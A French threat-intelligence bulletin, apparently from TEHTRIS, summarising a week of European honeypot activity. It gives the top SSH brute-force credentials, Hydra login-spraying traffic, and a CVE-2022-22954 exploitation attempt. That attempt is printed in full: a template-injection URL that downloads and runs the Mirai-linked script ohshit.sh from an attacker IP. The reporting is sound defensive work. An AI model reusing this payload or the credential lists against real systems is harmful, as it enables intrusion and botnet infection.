Plus de 116 000 adresses IP différentes ont interagi avec les honeypots de TEHTRIS déployés en Europe cette semaine. Sans surprise, les nationalités des adresses IP les plus actives sont américaines (23%), néerlandaises (15%), chinoises (7%), russes (7%) et bulgares (6%) – soit les mêmes nationalités prévalentes qu’observées précédemment.
TEHTRIS vous dévoile le top 10 des logins et des mots de passes utilisés par les attaquants et s’intéresse à deux types d’attaques, l’une utilisant un outil de test automatique, l’autre tentant d’exploiter une vulnérabilité récente sur WMware.
Top 10 des logins et mots de passe utilisés par les attaquants
Cette semaine, TEHTRIS vous partage les top 10 des logins et mots de passe les plus utilisés par les attaquants lors d’attaques bruteforce sur le protocole de connexion SSH :
| Passwords |
| 345gs5662d34 |
| 3245gs5662d34 |
| 123456 |
| admin |
| 1234 |
| password |
| 123 |
| 12345 |
| 12345678 |
| root |
| Logins |
| 345gs5662d34 |
| root |
| admin |
| ubuntu |
| test |
| user |
| postgres |
| oracle |
| ftpuser |
| git |
Ainsi, cette semaine, c’est le mot de passe 345gs5662d34 (et sa variante 3245gs5662d34) qui a constitué en tout plus de 30% des tentatives totales observées, dépassant les classiques « admin », « root » ou « password ». Plus de 7400 adresses IP différentes ont testé ces deux mots de passe. Pour rappel, on l’avait observé pour la première fois la semaine dernière sur les honeypots de TEHTRIS.
Pic d’attaque sur une infrastructure Irlandaise
Cette semaine, une IP britannique a été à l’origine de plus de 80% de l’activité web totale sur les honeypots de TEHTRIS. Cette activité s’est concentrée le 13/12/22 entre 15H20 et 16H. Elle émane de l’IP 139.162.236[.]147 (AS63949 LINODE LLC), qui cible exclusivement une infrastructure irlandaise.
Plus de 99% de ses requêtes sont constituées de l’URL /login.php accompagnée de RawData de type :
‘tgroup=&next=&tgcookieset=&group_list=&prod_login=root&prod_pass=111187&Login=Login’ ou ‘prod_login=admin&prod_pass=0000&Login=Login’ (les champs login et pass sont modifiés à chaque occurrence). De plus, les requêtes sont associées au User Agent Mozilla/5.0 (Hydra).
Hydra est un outil développé comme Proof of Concept afin de démontrer à quel point il est facile d’obtenir un accès non autorisé à un système à distance. Il permet de tester automatiquement des listes de logins / mots de passe prédéfinies. Selon son créateur, il ne devrait être utilisé qu’à des fins de recherche de vulnérabilités dans un cadre d’audit ou de pentest légal.
Cet exemple illustre bien que la frontière entre une utilisation légitime et abusive d’un outil de pentest est fine et que ces outils peuvent être repris par des acteurs malveillants.
Tentative d’exploitation d’une vulnérabilité VMware
L’IP américaine 195.178.120[.]13 (AS211252 – DELIS LLC) – qui n’avait jamais été observée sur notre réseau de honeypots avant le 16/12/22 – a scanné l’ensemble des honeypots européens de TEHTRIS à la recherche de la vulnérabilité d’exécution de code à distance affectant VMware Workspace ONE Access et VMware Identity Manager, correspondant à la CVE-2022-22954 (CVSS3 9.8).
URL:
/catalog-portal/ui/oauth/verify?error=&deviceUdid%3D%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F195.178.120.130%2Fohshit.sh%3B%20chmod%20777%20ohshit.sh%3B%20sh%20ohshit.sh%22%29%7DURL decode:
/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cd /tmp; wget http[:]//195.178.120[.]130/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh")}Ici, l’attaquant cherche à récupérer et exécuter le fichier ohshit.sh récupéré depuis l’URL http[:]//195.178.120[.]130/ohshit.sh, connu de la plateforme VirusTotal depuis le 16/12/22, soit à la même date à laquelle il a été observé pour la première fois sur les honeypots de TEHTRIS. L’IP 195.178.120[.]130 – également enregistré auprès de l’AS211252 (DELIS LLC) – a également ciblé directement les honeypots en tentant d’exploiter la vulnérabilité dans le serveur Apache CVE-2021-41773 (CVSS3 : 7.5).
Il y a une grande campagne qui cible les IoT en ce moment avec un script appelé « ohshit.sh », à l’instar du sha256 3cbe17bc00e637be7885542ce4bfd54296c11783376dca54fa157ef2811b88f9.
Ce script est défavorablement connu des bases de données publiques et est associé à la famille de malware Mirai, comme certains éléments que nous avions étudiés dans d’autres bulletins. Ici, l’attaquant cherche à accéder à un répertoire pour s’y dissimuler (/tmp, /var/run etc.), puis à télécharger un binaire pour chaque architecture (ARM, mips, x86…) depuis l’IP 193.35.18[.]225 (US – AS202685 – Aggros Operations Ltd) pour exécuter un script appelé « WTF ».